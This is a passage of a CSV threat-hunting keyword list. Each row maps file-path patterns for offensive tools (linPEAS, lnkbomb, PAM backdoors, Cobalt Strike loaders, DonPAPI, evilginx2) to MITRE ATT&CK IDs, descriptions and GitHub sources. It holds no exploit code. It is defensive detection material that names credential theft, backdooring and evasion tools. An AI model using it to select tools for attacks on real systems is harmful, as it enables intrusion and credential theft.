"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeas.txt*",".{0,1000}\/linpeas\.txt.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeasBaseBuilder.py*",".{0,1000}\/linpeasBaseBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeasBuilder.py*",".{0,1000}\/linpeasBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linux_ldso_dynamic.c*",".{0,1000}\/linux_ldso_dynamic\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_ldso_hwcap.c*",".{0,1000}\/linux_ldso_hwcap\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_ldso_hwcap_64.c*",".{0,1000}\/linux_ldso_hwcap_64\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_offset2lib.c*",".{0,1000}\/linux_offset2lib\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_stealth.py*",".{0,1000}\/linux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/linux-pam-backdoor.git*",".{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*/linux-smart-enumeration.git*",".{0,1000}\/linux\-smart\-enumeration\.git.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*/linWinPwn*",".{0,1000}\/linWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/listProxyPool?k=*",".{0,1000}\/listProxyPool\?k\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/llmnr-resolve.nse*",".{0,1000}\/llmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lltd-discovery.nse*",".{0,1000}\/lltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lnk2pwn.git*",".{0,1000}\/lnk2pwn\.git.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*/lnk2pwn-1.0.0.zip*",".{0,1000}\/lnk2pwn\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*/lnkbomb.git*",".{0,1000}\/lnkbomb\.git.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*/lnkbomb.py*",".{0,1000}\/lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*/LNKUp.git*",".{0,1000}\/LNKUp\.git.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*/LNKUp/generate.py*",".{0,1000}\/LNKUp\/generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*/load-assembly.py*",".{0,1000}\/load\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/LoadDllRemote.cs*",".{0,1000}\/LoadDllRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/loader/bypass.c",".{0,1000}\/loader\/bypass\.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/loader/bypass.h",".{0,1000}\/loader\/bypass\.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/loader/x64/Release/loader.exe*",".{0,1000}\/loader\/x64\/Release\/loader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*/loadercrypt_*.php*",".{0,1000}\/loadercrypt_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/local_execution_linux.exe*",".{0,1000}\/local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/local_exploit_suggester*",".{0,1000}\/local_exploit_suggester.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/local_map.exe*",".{0,1000}\/local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/local_thread_hijacking.exe*",".{0,1000}\/local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/LocalAdminSharp.git*",".{0,1000}\/LocalAdminSharp\.git.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*/LocalAdminSharp.sln*",".{0,1000}\/LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*/local-exploits/master/CVE*",".{0,1000}\/local\-exploits\/master\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/LocalPotato.git*",".{0,1000}\/LocalPotato\.git.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*/LocalPrivEsc/*",".{0,1000}\/LocalPrivEsc\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/localroot/2.6.x/elflbl*",".{0,1000}\/localroot\/2\.6\.x\/elflbl.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/localroot/2.6.x/h00lyshit*",".{0,1000}\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/LocalShellExtParse.git*",".{0,1000}\/LocalShellExtParse\.git.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*/LocalShellExtParse.py*",".{0,1000}\/LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Locksmith.git*",".{0,1000}\/Locksmith\.git.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "*/log_file_timestamps.json*",".{0,1000}\/log_file_timestamps\.json.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/log4shell.py*",".{0,1000}\/log4shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/login/e1837f4d-1d0c-49b8-a242-8f653226c137*",".{0,1000}\/login\/e1837f4d\-1d0c\-49b8\-a242\-8f653226c137.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/login_scanner*",".{0,1000}\/login_scanner.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/loginAAD.ps1*",".{0,1000}\/loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/login-securite/DonPAPI*",".{0,1000}\/login\-securite\/DonPAPI.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/logon_backdoor.git*",".{0,1000}\/logon_backdoor\.git.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*/logs/*/becon_*.log",".{0,1000}\/logs\/.{0,1000}\/becon_.{0,1000}\.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*/logs/beacon_log*",".{0,1000}\/logs\/beacon_log.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/lolbin.exe*",".{0,1000}\/lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*/LOLSpoof.git*",".{0,1000}\/LOLSpoof\.git.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*/LOLSpoof.nim*",".{0,1000}\/LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*/lookupsid.py*",".{0,1000}\/lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/LooneyPwner.git*",".{0,1000}\/LooneyPwner\.git.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation 